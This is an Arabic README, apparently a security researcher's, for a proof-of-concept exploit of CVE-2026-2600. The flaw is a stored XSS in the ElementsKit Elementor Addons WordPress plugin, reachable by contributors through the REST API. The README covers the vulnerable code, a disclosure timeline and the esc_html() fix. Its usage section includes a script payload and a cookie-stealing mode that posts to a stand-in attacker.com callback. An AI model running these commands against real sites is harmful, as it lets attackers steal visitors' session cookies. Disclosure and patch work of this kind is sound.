
إثبات مفهوم لاستغلال CVE-2026-2600، وهو XSS مخزّن في ElementsKit Elementor Addons <= 3.7.9، مما يسمح للمساهمين المُصادَق عليهم بحقن نصوص برمجية عشوائية عبر بيانات Elementor مُصمَّمة خصيصًا.
| CVSS | 6.4 متوسطة |
| الإصدارات المتأثرة | <= 3.7.9 |
| الإصدار المُصحَّح | 3.8.0 |
| الحد الأدنى للصلاحية | مساهم (edit_posts) |
| ناقل الهجوم | شبكة / تعقيد منخفض / صلاحيات منخفضة |
يعرض ودجت Simple Tab عناوين التبويبات باستخدام HTML عبر echo دون أي تهريب للمخرجات. في widgets/tab/tab.php، تقوم حلقة العرض بما يلي:
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}
يقوم محرر Elementor بتعقيم المدخلات على جانب العميل، لكن نقطة نهاية REST API (/wp-json/wp/v2/posts/{id}) تقبل حقل البيانات الوصفية _elementor_data مباشرة وتتجاوز تلك الطبقة بالكامل.
يمكن لأي مساهم مصادق عليه إرسال طلب PATCH لمنشور مع حمولة JSON خاصة بـ Elementor تُعيّن ekit_tab_title إلى HTML عشوائي. ولأن القيمة تُخزَّن حرفيًا في _elementor_data وتُعرض عبر echo دون esc_html() وقت العرض، يتم تنفيذ البرنامج النصي في متصفح كل زائر عند تحميل الصفحة.
يمكن لأي مساهم:
تأثر أكثر من 400 ألف تثبيت نشط وقت الإفصاح.
pip install requests
python3 poc.py https://target.com contributor p4ss
يقوم البرنامج النصي بالمصادقة عبر HTTP، ويجلب رمز REST المميز من محرر لوحة التحكم، وينشئ منشورًا مسودة، ويُرسل PATCH إلى _elementor_data مع حمولة XSS المدمجة في حقل ekit_tab_title، ثم ينشر المنشور. يؤكد المخرَج ما إذا كانت الحمولة نشطة في مصدر الصفحة.
# حمولة مخصصة
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'
# استخراج ملفات تعريف الارتباط مع رد اتصال
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal
# وضع وحدة التحكم التفاعلية
python3 console_poc.py
| التاريخ | الحدث |
|---|---|
| يناير 2026 | اكتُشفت عبر مراجعة فروقات SVN. تم تأكيد إثبات المفهوم (PoC). |
| يناير 2026 | أُبلغت إلى Patchstack Alliance مع التقرير الكامل وإثبات المفهوم. |
| مارس 2026 | أصدرت Wpmet الإصلاح في الإصدار v3.8.0. |
| أبريل 2026 | نُشرت CVE-2026-2600. تم تعيين درجة CVSS 6.4 متوسطة. |
أضافت Wpmet دالة esc_html() حول مخرجات عنوان التبويب في widgets/tab/tab.php:
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';